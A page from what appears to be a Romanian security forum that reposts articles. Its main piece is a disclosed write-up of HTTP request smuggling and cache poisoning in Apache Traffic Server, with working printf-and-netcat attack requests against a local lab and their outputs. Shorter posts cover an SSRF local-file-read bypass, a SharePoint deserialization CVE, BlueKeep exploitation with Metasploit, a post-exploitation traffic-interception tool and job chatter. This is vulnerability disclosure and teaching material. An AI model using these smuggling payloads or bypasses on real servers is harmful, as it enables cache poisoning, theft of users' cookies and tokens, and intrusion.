<HTML> <HEAD> <TITLE>Bad Request</TITLE> </HEAD> <BODY BGCOLOR="white" FGCOLOR="black"> <H1>Bad Request</H1> <HR> <FONT FACE="Helvetica,Arial"><B> Description: Could not process this request. </B></FONT> <HR> </BODY> Then: HTTP/1.1 200 OK Server: ATS/7.1.1 Date: Fri, 26 Oct 2018 15:34:53 GMT Content-Type: text/html Content-Length: 120 Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT ETag: "5bd321bc-78" X-Location-echo: /index.html?replacing=1&zorg=2 X-Default-VH: 0 Cache-Control: public, max-age=300 Accept-Ranges: bytes Age: 0 Connection: keep-alive $<html><head><title>Nginx default static page</title></head> <body><h1>Hello World</h1> <p>It works!</p> </body></html> And then the extra unused response: HTTP/1.1 404 Not Found Server: ATS/7.1.1 Date: Fri, 26 Oct 2018 15:34:53 GMT Content-Type: text/html Content-Length: 153 Age: 0 Connection: keep-alive <html> <head><title>404 Not Found</title></head> <body> <center><h1>404 Not Found</h1></center> <hr><center>nginx/1.15.5</center> </body> </html> If you try to use port 8001 (so transit via HaProxy) you will not get the expected attacking result. That attacking query is really too bad. HTTP/1.0 400 Bad request Cache-Control: no-cache Connection: close Content-Type: text/html <html><body><h1>400 Bad request</h1> Your browser sent an invalid request. </body></html> That's an HTTP request splitting attack, but real world usage may be hard to find. The fix on ATS is the 'close on error', when an error 400 is triggered the pipelined is stopped, the socket is closed after the error. Request Splitting using Huge Header, Early End-Of-Query This attack is almost the same as the previous one, but do not need the magical NULL character to trigger the end-of-query event. By using headers with a size around 65536 characters we can trigger this event, and exploit it the same way than the with the NULL premature end of query. A note on printf huge header generation with printf. Here I'm generating a query with one header containing a lot of repeated characters (= or 1 for example): X: ==============( 65 532 '=' )========================\r\n You can use the %ns form in printf to generate this, generating big number of spaces. But to do that we need to replace some special characters with tr and use _ instead of spaces in the original string: printf 'X:_"%65532s"\r\n' | tr " " "=" | tr "_" " " Try it against Nginx : printf 'GET_/something.html?zorg=6_HTTP/1.1\r\n'\ 'Host:_dummy-host7.example.com\r\n'\ 'X:_"%65532s"\r\n'\ 'GET_http://dummy-host7.example.com/index.html?replaced=0&cache=8_HTTP/1.1\r\n'\ '\r\n'\ |tr " " "1"\ |tr "_" " "\ |nc -q 1 127.0.0.1 8002 I gat one error 400, that's the normal stuff. It Nginx does not like huge headers. Now try it against ATS7: printf 'GET_/something.html?zorg2=5_HTTP/1.1\r\n'\ 'Host:_dummy-host7.example.com\r\n'\ 'X:_"%65534s"\r\n'\ 'GET_http://dummy-host7.example.com/index.html?replaced=0&cache=8_HTTP/1.1\r\n'\ '\r\n'\ |tr " " "1"\ |tr "_" " "\ |nc -q 1 127.0.0.1 8007 And after the error 400 we have a 200 OK response. Same problem as in the previous example, and same fix. Here we still have a query with a bad header containing a space, and also one quite big header but we do not have the NULL character. But, yeah, 65000 character is very big, most actors would reject a query after 8000 characters on one line. HTTP/1.1 400 Invalid HTTP Request Date: Fri, 26 Oct 2018 15:40:17 GMT Connection: keep-alive Server: ATS/7.1.1 Cache-Control: no-store Content-Type: text/html Content-Language: en Content-Length: 220 <HTML> <HEAD> <TITLE>Bad Request</TITLE> </HEAD> <BODY BGCOLOR="white" FGCOLOR="black"> <H1>Bad Request</H1> <HR> <FONT FACE="Helvetica,Arial"><B> Description: Could not process this request. </B></FONT> <HR> </BODY> HTTP/1.1 200 OK Server: ATS/7.1.1 Date: Fri, 26 Oct 2018 15:40:17 GMT Content-Type: text/html Content-Length: 120 Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT ETag: "5bd321bc-78" X-Location-echo: /index.html?replaced=0&cache=8 X-Default-VH: 0 Cache-Control: public, max-age=300 Accept-Ranges: bytes Age: 0 Connection: keep-alive $<html><head><title>Nginx default static page</title></head> <body><h1>Hello World</h1> <p>It works!</p> </body></html> Cache Poisoning using Incomplete Queries and Bad Separator Prefix Cache poisoning, that's sound great. On smuggling attacks you should only have to trigger a request or response splitting attack to prove a defect, but when you push that to cache poisoning people usually understand better why splitted pipelines are dangerous. ATS support an invalid header Syntax: HEADER[SPACE]:HEADER VALUE\r\n That's not conform to RFC7230 section 3.3.2: Each header field consists of a case-insensitive field name followed by a colon (":"), optional leading whitespace, the field value, and optional trailing whitespace. So : HEADER:HEADER_VALUE\r\n => OK HEADER:[SPACE]HEADER_VALUE\r\n => OK HEADER:[SPACE]HEADER_VALUE[SPACE]\r\n => OK HEADER[SPACE]:HEADER_VALUE\r\n => NOT OK And RFC7230 section 3.2.4 adds (bold added): No whitespace is allowed between the header field-name and colon. In the past, differences in the handling of such whitespace have led to security vulnerabilities in request routing and response handling. A server MUST reject any received request message that contains whitespace between a header field-name and colon with a response code of 400 (Bad Request). A proxy MUST remove any such whitespace from a response message before forwarding the message downstream. ATS will interpret the bad header, and also forward it without alterations. Using this flaw we can add some headers in our request that are invalid for any valid HTTP agents but still interpreted by ATS like: Content-Length :77\r\n Or (try it as an exercise) Transfer-encoding :chunked\r\n Some HTTP servers will effectively reject such message with an error 400. But some will simply ignore the invalid header. That's the case of Nginx for example. ATS will maintain a keep-alive connection to the Nginx Backend, so we'll use this ignored header to transmit a body (ATS think it's a body) that is in fact a new query for the backend. And we'll make this query incomplete (missing a crlf on end-of-header) to absorb a future query sent to Nginx. This sort of incomplete-query filled by the next coming query is also a basic Smuggling technique demonstrated 13 years ago. 01 GET /does-not-exists.html?cache=x HTTP/1.1\r\n 02 Host: dummy-host7.example.com\r\n 03 Cache-Control: max-age=200\r\n 04 X-info: evil 1.5 query, bad CL header\r\n 05 Content-Length :117\r\n 06 \r\n 07 GET /index.html?INJECTED=1 HTTP/1.1\r\n 08 Host: dummy-host7.example.com\r\n 09 X-info: evil poisoning query\r\n 10 Dummy-incomplete: Line 05 is invalid (' :'). But for ATS it is valid. Lines 07/08/09/10 are just binary body data for ATS transmitted to backend. For Nginx: Line 05 is ignored. Line 07 is a new request (and first response is returned). Line 10 has no "\r\n". so Nginx is still waiting for the end of this query, on the keep-alive connection opened by ATS ... Attack schema [ATS Cache poisoning - space before header separator + backend ignoring bad headers] Innocent Attacker ATS Nginx | | | | | |--A(1A+1/2B)-->| | * Issue 1 & 2 * | | |--A(1A+1/2B)-->| * Issue 3 * | | |<-A(404)-------| | | | [1/2B] | |<-A(404)-------| [1/2B] | |--C----------->| [1/2B] | | |--C----------->| * ending B * | | [*CP*]<--B(200)----| | |<--B(200)------| | |--C--------------------------->| | |<--B(200)--------------------[HIT] | 1A + 1/2B means request A + an incomplete query B A(X) : means X query is hidden in body of query A CP : Cache poisoning Issue 1 : ATS transmit 'header[SPACE]: Value', a bad HTTP header. Issue 2 : ATS interpret this bad header as valid (so 1/2B still hidden in body) Issue 3 : Nginx encounter the bad header but ignore the header instead of sending an error 400. So 1/2B is discovered as a new query (no Content-length) request B contains an incomplete header (no crlf) ending B: the 1st line of query C ends the incomplete header of query B. all others headers are added to the query. C disappears and mix C HTTP credentials with all previous B headers (cookie/bearer token/Host, etc.) Instead of cache poisoning you could also play with the incomplete 1/B query and wait for the Innocent query to finish this request with HTTP credentials of this user (cookies, HTTP Auth, JWT tokens, etc.). That would be another attack vector. Here we will simply demonstrate cache poisoning. Run this attack: for i in {1..9} ;do printf 'GET /does-not-exists.html?cache='$i' HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'Cache-Control: max-age=200\r\n'\ 'X-info: evil 1.5 query, bad CL header\r\n'\ 'Content-Length :117\r\n'\ '\r\n'\ 'GET /index.html?INJECTED='$i' HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'X-info: evil poisoning query\r\n'\ 'Dummy-unterminated:'\ |nc -q 1 127.0.0.1 8007 done It should work, Nginx adds an X-Location-echo header in this lab configuration, where we have the first line of the query added on the response headers. This way we can observe that the second response is removing the real second query first line and replacing it with the hidden first line. On my case the last query response contained: X-Location-echo: /index.html?INJECTED=3 But this last query was GET /index.html?INJECTED=9. You can check the cache content with: for i in {1..9} ;do printf 'GET /does-not-exists.html?cache='$i' HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'Cache-Control: max-age=200\r\n'\ '\r\n'\ |nc -q 1 127.0.0.1 8007 done In my case I found 6 404 (regular) and 3 200 responses (ouch), the cache is poisoned. If you want to go deeper in Smuggling understanding you should try to play with wireshark on this example. Do not forget to restart the cluster to empty the cache. Here we did not played with a C query yet, the cache poisoning occurs on our A query. Unless you consider the /does-not-exists.html?cache='$i' as C queries. But you can easily try to inject a C query on this cluster, where Nginx as some waiting requests, try to get it poisoned with /index.html?INJECTED=3 responses: for i in {1..9} ;do printf 'GET /innocent-C-query.html?cache='$i' HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'Cache-Control: max-age=200\r\n'\ '\r\n'\ |nc -q 1 127.0.0.1 8007 done This may give you a touch on real world exploitations, you have to repeat the attack to obtain something. Vary the number of servers on the cluster, the pools settings on the various layers of reverse proxies, etc. Things get complex. The easiest attack is to be a chaos generator (defacement like or DOS), fine cache replacement of a target on the other hand requires fine study and a bit of luck. Does this work on port 8001 with HaProxy? well, no, of course. Our header syntax is invalid. You would need to hide the bad query syntax from HaProxy, maybe using another smuggling issue, to hide this bad request in a body. Or you would need a load balancer which does not detect this invalid syntax. Note that in this example the nginx behavior on invalid header syntax (ignore it) is also not standard (and wont be fixed, AFAIK). This invalid space prefix problem is the same issue as Apache httpd in CVE-2016-8743. HTTP Response Splitting: Content-Length Ignored on Cache Hit Still there? Great! Because now is the nicest issue. At least for me it was the nicest issue. Mainly because I've spend a lot of time around it without understanding it. I was fuzzing ATS, and my fuzzer detected issues. Trying to reproduce I had failures, and success on previoulsy undetected issues, and back to step1. Issues you cannot reproduce, you start doubting that you saw it before. Suddenly you find it back, but then no, etc. And of course I was not searching the root cause on the right examples. I was for example triggering tests on bad chunked transmissions, or delayed chunks. It was very a long (too long) time before I detected that all this was linked to the cache hit/cache miss status of my requests. On cache Hit Content-Length header on a GET query is not read. That's so easy when you know it... And exploitation is also quite easy. We can hide a second query in the first query body, and on cache Hit this body becomes a new query. This sort of query will get one response first (and, yes, that's only one query), on a second launch it will render two responses (so an HTTP request Splitting by definition): 01 GET /index.html?cache=zorg42 HTTP/1.1\r\n 02 Host: dummy-host7.example.com\r\n 03 Cache-control: max-age=300\r\n 04 Content-Length: 71\r\n 05 \r\n 06 GET /index.html?cache=zorg43 HTTP/1.1\r\n 07 Host: dummy-host7.example.com\r\n 08 \r\n Line 04 is ignored on cache hit (only after the first run, then), after that line 06 is now a new query and not just the 1st query body. This HTTP query is valid, THERE IS NO invalid HTTP syntax present. So it's quite easy to perform a successful complete Smuggling attack from this issue, even using HaProxy in front of ATS. If HaProxy is configured to use a keep-alive connection to ATS we can fool the HTTP stream of HaProxy by sending a pipeline of two queries where ATS sees 3 queries: Attack schema [ATS HTTP-Splitting issue on Cache hit + GET + Content-Length] Something HaProxy ATS Nginx |--A----------->| | | | |--A----------->| | | | |--A----------->| | | [cache]<--A--------| | | (etc.) <------| | warmup --------------------------------------------------------- | | | | attack |--A(+B)+C----->| | | | |--A(+B)+C----->| | | | [HIT] | * Bug * | |<--A-----------| | * B 'discovered' * |<--A-----------| |--B----------->| | | |<-B------------| | |<-B------------| | [ouch]<-B----------| | | * wrong resp. * | | |--C----------->| | | |<--C-----------| | [R]<--C----------| | rejected First, we need to init cache, we use port 8001 to get a stream HaProxy->ATS->Nginx. printf 'GET /index.html?cache=cogip2000 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'Cache-control: max-age=300\r\n'\ 'Content-Length: 0\r\n'\ '\r\n'\ |nc -q 1 127.0.0.1 8001 You can run it two times and see that on a second time it does not reach the nginx access.log. Then we attack HaProxy, or any other cache set in front of this HaProxy. We use a pipeline of 2 queries, ATS will send back 3 responses. If a keep-alive mode is present in front of ATS there is a security problem. Here it's the case because we do not use option: http-close on HaProxy (which would prevent usage of pipelines). printf 'GET /index.html?cache=cogip2000 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ 'Cache-control: max-age=300\r\n'\ 'Content-Length: 74\r\n'\ '\r\n'\ 'GET /index.html?evil=cogip2000 HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ '\r\n'\ 'GET /victim.html?cache=zorglub HTTP/1.1\r\n'\ 'Host: dummy-host7.example.com\r\n'\ '\r\n'\ |nc -q 1 127.0.0.1 8001 Query for /victim.html (should be a 404 in our example) gets response for /index.html (X-Location-echo: /index.html?evil=cogip2000). HTTP/1.1 200 OK Server: ATS/7.1.1 Date: Fri, 26 Oct 2018 16:05:41 GMT Content-Type: text/html Content-Length: 120 Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT ETag: "5bd321bc-78" X-Location-echo: /index.html?cache=cogip2000 X-Default-VH: 0 Cache-Control: public, max-age=300 Accept-Ranges: bytes Age: 12 $<html><head><title>Nginx default static page</title></head> <body><h1>Hello World</h1> <p>It works!</p> </body></html> HTTP/1.1 200 OK Server: ATS/7.1.1 Date: Fri, 26 Oct 2018 16:05:53 GMT Content-Type: text/html Content-Length: 120 Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT ETag: "5bd321bc-78" X-Location-echo: /index.html?evil=cogip2000 X-Default-VH: 0 Cache-Control: public, max-age=300 Accept-Ranges: bytes Age: 0 $<html><head><title>Nginx default static page</title></head> <body><h1>Hello World</h1> <p>It works!</p> </body></html> Here the issue is critical, especially because there is not invalid syntax in the attacking query. We have an HTTP response splitting, this means two main impacts: ATS may be used to poison or hurt an actor used in front of it the second query is hidden (that's a body, binary garbage for an http actor), so any security filter set in front of ATS cannot block the 2nd query. We could use that to hide a second layer of attack like an ATS cache poisoning as described in the other attacks. Now that you have a working lab you can try embedding several layers of attacks... That's what the Drain the request body if there is a cache hit fix is about. Just to better understand real world impacts, here the only one receiving response B instead of C is the attacker. HaProxy is not a cache, so the mix C-request/B-response on HaProxy is not a real direct threat. But if there is a cache in front of HaProxy, or if we use several chained ATS proxies... Timeline 2017-12-26: Reports to project maintainers 2018-01-08: Acknowledgment by project maintainers 2018-04-16: Version 7.1.3 with most of the fix 2018-08-04: Versions 7.1.4 and 6.2.2 (officially containing all fixs, and some other CVE fixs) 2018-08-28: CVE announce 2019-09-17: This article (yes, url date is wrong, real date is september) See also Video Defcon 24: HTTP Smuggling Defcon support Video Defcon demos Sursa: https://regilero.github.io/english/security/2019/10/17/security_apache_traffic_server_http_smuggling/
      • 1
      • Upvote
  4. SSRF | Reading Local Files from DownNotifier server Posted on September 18, 2019 by Leon Hello guys, this is my first write-up and I would like to share it with the bug bounty community, it’s a SSRF I found some months ago. DownNotifier is an online tool to monitor a website downtime. This tool sends an alert to registered email and sms when the website is down. DownNotifier has a BBP on Openbugbounty, so I decided to take a look on https://www.downnotifier.com. When I browsed to the website, I noticed a text field for URL and SSRF vulnerability quickly came to mind. Getting XSPA The first thing to do is add http:127.0.0.1:22 on “Website URL” field. Select “When the site does not contain a specific text” and write any random text. I sent that request and two emails arrived in my mailbox a few minutes later. The first to alert that a website is being monitored and the second to alert that the website is down but with the response inside an html file. And what is the response…? Getting Local File Read I was excited but that’s not enough to fetch very sensitive data, so I tried the same process but with some uri schemes as file, ldap, gopher, ftp, ssh, but it didn’t work. I was thinking how to bypass that filter and remembered a write-up mentioning a bypass using a redirect with Location header in a PHP file hosted on your own domain. I hosted a php file with the above code and the same process registering a website to monitor. A few minutes later an email arrived at the mailbox with an html file. And the response was… I reported the SSRF to DownNotifier support and they fixed the bug very fast. I want to thank the DownNotifier support because they were very kind in our communication and allowed me to publish this write-up. I also want to thank the bug bounty hunter who wrote the write-up where he used the redirect technique with the Location header. Write-up: https://medium.com/@elberandre/1-000-ssrf-in-slack-7737935d3884 Sursa: https://www.openbugbounty.org/blog/leonmugen/ssrf-reading-local-files-from-downnotifier-server/
      • 1
      • Upvote
  5. CVE-2019-1257: Code Execution on Microsoft SharePoint Through BDC Deserialization September 19, 2019 | The ZDI Research Team SUBSCRIBE Earlier this year, researcher Markus Wulftange (@mwulftange) reported a remote code execution (RCE) vulnerability in Microsoft SharePoint that ended up being patched as CVE-2019-0604. He wasn’t done. In September, three additional SharePoint RCEs reported by Markus were addressed by Microsoft: CVE-2019-1295, CVE-2019-1296, and CVE-2019-1257. This blog looks at that last CVE, also known as ZDI-19-812, in greater detail. This bug affects all supported versions of SharePoint and received Microsoft’s highest Exploit Index rating, which means they expect to see active attacks in the near future. Vulnerability Details The Business Data Connectivity (BDC) Service in Microsoft SharePoint 2016 is vulnerable to arbitrary deserialization of XmlSerializer streams due to arbitrary method parameter types in the definition of custom BDC models. As shown by Alvaro Muñoz & Oleksandr Mirosh in their Black Hat 2017 talk [PDF], arbitrary deserialization of XmlSerializer streams can result in arbitrary code execution. SharePoint allows the specification of custom BDC models using the Business Data Connectivity Model File Format (MS-BDCMFFS) data format. Part of this specification is the definition of methods and parameters. Here is an example excerpt, as provided by Microsoft: This defines a method named GetCustomer that wraps a stored procedure named sp_GetCustomer (see RdbCommandText property). Both the input parameters (Direction="In") and return parameters (Direction="Return") get defined with their respective type description. In the example shown above, the input parameter has a primitive type of System.Int32, which is safe. The problem occurs if a BDC model is defined that has a parameter of type Microsoft.BusinessData.Runtime.DynamicType. This would be done to allow the caller flexibility to pass many different types of values for that parameter. The result is deserialization of an arbitrary XmlSerializer stream provided by the caller. The Exploit This vulnerability was tested on Microsoft SharePoint Server 2016 with KB4464594 installed. It was running on top of the 64-bit version of Windows Server 2016 update 14393.3025. In order to demonstrate exploitation, these steps are required: 1: An administrator must define a custom BDC model that includes a method with a parameter with type Microsoft.BusinessData.Runtime.DynamicType. For the custom BDC model, the Database Model example was used as a template and heavily reduced: 2: The administrator must then upload the BDC model via the SharePoint Central Administration | Application Management | Manage service applications | Business Data Connectivity Service. Alternatively, this can also be accomplished via PowerShell: 3: The attacker can then invoke the method, passing a payload in the parameter. On the SharePoint server, you will find that two instances of cmd.exe and one instance of win32calc.exe have been spawned, running as the identity of the SharePoint application pool. To see the path through the code, attach a debugger to w3wp.exe for the SharePoint application. Setting a break point at System.Web.dll!System.Web.UI.ObjectStateFormatter.Deserialize reveals the following call stack: Conclusion Successful exploitation of this won’t get you admin on the server, but it will allow an attacker to execute their code in the context of the SharePoint application pool and the SharePoint server farm account. According to Microsoft, they addressed this vulnerability in their September patch by correcting how SharePoint checks the source markup of application packages. Thanks again to Markus for this submission, and we hope to see more reports from him in the future. The September release also included a patch to fix a bug in the Azure DevOps (ADO) and Team Foundation Server (TFS) that could allow an attacker to execute code on the server in the context of the TFS or ADO service account. We’ll provide additional details of that bug in the near future. Until then, follow the team for the latest in exploit techniques and security patches. Sursa: https://www.zerodayinitiative.com/blog/2019/9/18/cve-2019-1257-code-execution-on-microsoft-sharepoint-through-bdc-deserialization
  6. Cand o sa am timp o sa fac curatenie (fara sa mai tin cont de vechimea si utilitatea userilor care fac caterinca si injura). Desi nu e cea mai buna intrebare, dati voi dovada de inteligenta si oferiti un raspuns din care sa inteleaga cum functioneaza lucrurile.
  7. Bitdefender is proud to announce PwnThyBytes Capture The Flag – our competitive ethical hacking contest September 17, 2019 2 Min Read We hope you’ve all enjoyed your summer holidays, chilling out on the beach, seeing new places and recharging your batteries. Because this autumn we’ve prepared the first edition of PwnThyBytes CTF, a top-notch global computer security competition, which we hope will be a fun and challenging experience for everybody. The contest starts on September 28th and we’re hyped to give you a sneak peek at what to expect. Information security competitions, such as capture the flag (CTF) contests, have surged in popularity during the past decade. Think of them almost like e-sports for ethical hacking. In line with our mission to safeguard users’ data, we at Bitdefender host this event to bring together some of the most skilled teams around the world in areas such as Reverse Engineering, Binary Exploitation, Web Application Auditing, Computer Forensics Investigation, and Cryptography. We extend a warm invitation to everyone connected to or interested in computer security. Build up a team of friends or seasoned professionals, or even have at it by yourself if that’s your thing. Pit yourselves against the most seasoned security professionals on the CTF scene. Enjoy the experience of displaying your techniques, learning new skills, competing with kindred spirits, all for the chance of claiming the rewards and the glory that comes with them. Do you like delving deep into programs, websites, and anything related to computers? Do you like challenging yourself for the pleasure of improvement? Do you want to see just how good you are compared to the rest? If any of these questions strikes a nerve, click here to register. We look forward to seeing you showcase your skills! What do I need to know? Some skills/knowledge you’ll need throughout the competition: Systems programming and OS internals (Linux, Windows), executable formats knowledge (ELF, PE) Reverse Engineering: anti-reverse techniques, anti-debugging techniques, packers, obfuscation, kernel modules Architectures: X86, X86_64, ARM, Web Assembly Vulnerability analysis and exploitation of binaries Web Application Auditing Computer forensics Investigation: memory forensics, software defined radio, file system forensics Cryptography: symmetric, asymmetric, post-quantum schemes and general math skills Graph algorithms What are the prizes? 1st place: 2,048 € 2nd place: 1,024 € 3rd place: 512 € Sursa: https://labs.bitdefender.com/2019/09/bitdefender-is-proud-to-announce-pwnthybytes-capture-the-flag-our-competitive-ethical-hacking-contest/
      • 3
      • Upvote
  8. How to Exploit BlueKeep Vulnerability with Metasploit Sep 10, 2019 • Razvan Ionescu, Stefan Bratescu, Cristin Sirbu In this article we show our approach for exploiting the RDP BlueKeep vulnerability using the recently proposed Metasploit module. We show how to obtain a Meterpreter shell on a vulnerable Windows 2008 R2 machine by adjusting the Metasploit module code (GROOMBASE and GROOMSIZE values) because the exploit does not currently work out-of-the-box. Further on, we explain the steps we took to make the module work properly on our target machine: Background Prerequisites Installing the Bluekeep exploit module in Metasploit Preparing the target machine Adjusting the BlueKeep exploit Running the exploit module Conclusions 1. Background BlueKeep is a critical Remote Code Execution vulnerability in Microsoft’s RDP service. Since the vulnerability is wormable, it has caught a great deal of attention from the security community, being in the same category with EternalBlue MS17-010 and Conficker MS08-067. You can read an in-depth analysis of the BlueKeep vulnerability on our blog post. A few days ago, a Metasploit contributor - zerosum0x0 - has submitted a pull request to the framework containing an exploit module for BlueKeep(CVE-2019-0708). The Rapid7 team has also published an article about this exploit on their blog. As of now, the module is not yet integrated into the main Metasploit branch (it’s still a pull request) and it only targets Windows 2008 R2 and Windows 7 SP1, 64-bit versions. Furthermore, the module is now ranked as Manual since the user needs to provide additional information about the target, otherwise it risks of crashing it with BSOD Articol complet: https://pentest-tools.com/blog/bluekeep-exploit-metasploit/
      • 1
      • Upvote
  9. Da, nu e tocmai fiabil, e open-source. Probabil sunt versiuni mult mai stabile, desi nu cred ca 100%.
  10. NetRipper is a post exploitation tool targeting Windows systems which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption. https://github.com/NytroRST/NetRipper
  11. Eu am facut ceva de genul acesta pentru Shellcode compiler, insa nu stiu daca metoda mea e cea mai potrivita. In principiu ar trebui sa folosesti niste tokens (e.g. caractere speciale) si in functie de ele sa faci ce ai de facut. Nu stiu sa explic cum functioneaza, insa gasesti tutoriale legate de asa ceva si chiar si implementari de compilere C (basic) si probabil alte limbaje. Ce am facut eu a fost sa definesc un "state machine". Ideea mea e simpla: sunt in starea "x" (de exemplu starea neutra, in care astept ceva util, gen declarare de functie sau apel de functie). Apoi citesc caracter cu caracter in functie de starea mea. In limbajul meu poti defini o functie folosind "function nume_functie(parametri)" iar eu citesc doar caractere alfa numerice pana la un alt caracter. Daca e cuvantul e "function" inseamna ca utilizatorul vrea sa declare o functie si trec in starea de citire de declaratie de functie. Daca e altceva, ma astept sa vrea sa apeleze o functie si trec in starea respectiva. Pentru declararea de functie ma astept sa urmeze un spatiu (sau mai multe, sau tab-uri, in functie de cat de permisiv vrei sa fii). Daca nu sunt, poc, eroare. Daca da, trec in starea de citire a numelui functie (alpha numeric) pana la intalnirea caracterului "(" care indica faptul ca urmeaza parametrii). Si tot asa... Nu stiu care solutie ar fi mai buna, solutia mea mi s-a parut simpla, dar poate sa nu fie cea mai buna si mai practica. Daca vrei sa o folosesti, ia o foaie si un pix si deseneaza state machine-ul, cum vrei sa arate si prin ce caractere in ce alte stari sa ajunga. PS: La trecerea dintre stari trebuie sa salvezi niste date, cum ar fi numele unei functii.
  12. Initial Metasploit Exploit Module for BlueKeep (CVE-2019-0708) by Brent Cook Sep 06, 2019 Today, Metasploit is releasing an initial public exploit module for CVE-2019-0708, also known as BlueKeep, as a pull request on Metasploit Framework. The initial PR of the exploit module targets 64-bit versions of Windows 7 and Windows 2008 R2. The module builds on proof-of-concept code from Metasploit contributor @zerosum0x0, who also contributed Metasploit’s BlueKeep scanner module and the scanner and exploit modules for EternalBlue. Metasploit’s exploit makes use of an improved general-purpose RDP protocol library, as well as enhanced RDP fingerprinting capabilities, both of which will benefit Metasploit users and contributors well beyond the context of BlueKeep scanning and exploitation. As an open-source project, one of Metasploit’s guiding principles is that knowledge is most powerful when shared. Democratic access to attacker capabilities, including exploits, is critical for defenders—particularly those who rely on open-source tooling to understand and effectively mitigate risk. Exploitation notes By default, Metasploit’s BlueKeep exploit only identifies the target operating system version and whether the target is likely to be vulnerable. The exploit does not currently support automatic targeting; it requires the user to manually specify target details before it will attempt further exploitation. If the module is interrupted during exploitation, or if the incorrect target is specified, the target will crash with a bluescreen. Users should also note that some elements of the exploit require knowledge of how Windows kernel memory is laid out, which varies depending on both OS version and the underlying host platform (virtual or physical); the user currently needs to specify this correctly to run the exploit successfully. Server versions of Windows also require a non-default configuration for successful exploitation—namely, changing a registry setting to enable audio sharing. This limitation may be removed in the future. One of the drivers in our releasing the exploit code today as a PR on Metasploit Framework is to enlist the help of the global developer and user community to test, verify, and extend reliability across target environments. As with many Metasploit exploits whose utility has endured over the years, we expect to continue refining the BlueKeep exploit over time. We look forward to working with the Metasploit community to add support for automatic targeting, improve reliability, and expand the range of possible targets. In addition to PoC contributors @zerosum0x0 and @ryHanson, we owe many (many!) enthusiastic thanks to @TheColonial, [@rickoates],(https://twitter.com/rickoates) @zeroSteiner, @TomSellers, @wvu, @bwatters, @sinn3r, and the rest of the Metasploit development team for their invaluable assistance and leadership on development (which included an extensive port of zerosum0x0’s original Python exploit code to Ruby), testing, and integration. New folks interested in joining the list of testers and contributors can get started here! Detection and solution notes Defenders may want to note that BlueKeep exploitation looks similar to a BlueKeep vulnerability scanner at the network level. If your network IDS/IPS is already able to detect the scanner sequence, it almost certainly detects the exploit as well. For host-based IDS/IPS users, the kernel shellcode loads a child process to the Windows process spoolsv.exe by default, which is a similar indicator of compromise to exploits such as EternalBlue (MS17-010). All that said, there's one important caveat for Metasploit payload detection tools, such as those that alert on generic meterpreter payloads in network traffic: If an intrusion prevention system interrupts in-progress BlueKeep exploitation simply because it detects a payload signature against an unpatched target, breaking that network connection will likely crash the target as a side effect, since the exploit code is actually triggered by a network disconnect. Because of this, users are urged to test their IPS against this Metasploit module once the PR is merged into the Framework master branch. While specific defenses and detection against this particular exploit are useful, newer RDP vulnerabilities in the ‘DejaBlue’ family have underscored this protocol in general as a risk. The protocol’s inherent complexity suggests that the known bugs today will not be the last, particularly since exploit developers and researchers now have a more nuanced understanding of RDP and its weaknesses. Continued exploitation is likely, as is increased exploit sophistication. If you still need to use RDP in your environment, then in addition to standard recommendations such as enabling Network Level Authentication, tightening your network access controls will also go a long way toward mitigating future vulnerabilities. The broader security community has emphasized the importance and urgency of patching against CVE-2019-0708. We echo this advice: Rapid7 Labs has previously written about the uptick in malicious RDP activity they have observed since the publication of the BlueKeep vulnerability. Rapid7 Labs has not observed an increased barrage of incoming attacks against RDP past the initial uptick in malicious activity after BlueKeep was published. The chart above looks similar to the Labs team’s previous report on RDP and while activity is at elevated levels when compared to a year ago, overall opportunistic attacker activity is much lower than we expected to see by this point in the post-vulnerability release cycle. Our research partners at BinaryEdge have up-to-date scan results for systems vulnerable to BlueKeep and have indicated they are still observing just over 1 million exposed nodes. For profiles of attacker activity and detailed recommendations on defending against BlueKeep exploitation, see Rapid7’s previous analysis here. About Metasploit and Rapid7 Metasploit is a collaboration between Rapid7 and the open-source community. Together, we empower defenders with world-class offensive security content and the ability to understand, exploit, and share vulnerabilities. For more information, see https://www.metasploit.com. Sursa: https://blog.rapid7.com/2019/09/06/initial-metasploit-exploit-module-for-bluekeep-cve-2019-0708/amp/?__twitter_impression=true
  13. Daca e cineva interesat de programul bug bounty (pprivat) astept un PM.
  14. Da, un lucru util de stiut e ca daca vrei sa castigi mai mult, trebuie sa schimbi firma la care lucrezi din cand in cand.
  15. Da, daca se pune problema asa, am auzit ca ar fi doar vreo 3 persoane in Romania care stiu nu stiu ce limbaj folosit de catre cateva companii imense (extrem de vechi limbajul, de aceea nu il stiu si alte persoane). Aceste persoane se stiu intre ele si au salarii uriase. Dar daca o companie trece pe ceva mai nou, ce job isi mai gasesti una dintre acele persoane? Acum se pune problema urmatoare: daca inveti X iti gasesti loc de munca in Romania? Nu am vazut prea multe pozitii pe "R", "Scala" sau "Elixir" (ce sloboz mai e si asta?). Am lucrat cu mai multe firme (mari) in Romania care dezvoltau in Java si erau in continua cautare de oameni (bine, recunosc, seniori). Si desigur, plateau foarte bine. Puteti face un test simplu: 387 Jobs java, 124 Jobs php, 281 Jobs javascript, 26 Jobs swift, 40 Jobs ruby ... Dand un simplu search pe BestJobs.
  16. Daca vrei sa ai o afacere, evident, e foarte bine sa fii foarte bun din punct de vedere tehnic, insa nu e de ajuns. Pentru gasit clienti iti trebuie niste lucruri: relatii/cunostiinte daca se poate, aptitudini de vanzari, marketing, PR...
  17. Din cate stiu eu, Java e cel mai cautat si mai bine platit. Nu stiu de JavaScript, dar PHP cred ca este undeva mai jos ca Java. Ideea e ca firmele mari, corporatiile, vor software custom, rapid si stabil si folosesc Java cu framework-uri ca Spring(Boot) si Hibernate. Si par sa fie mai multe firme care abordeaza lucrurile astfel, spre deosebire de PHP. PS: E doar parerea mea, nu trebuie sa iei asta drept ceva sigur.
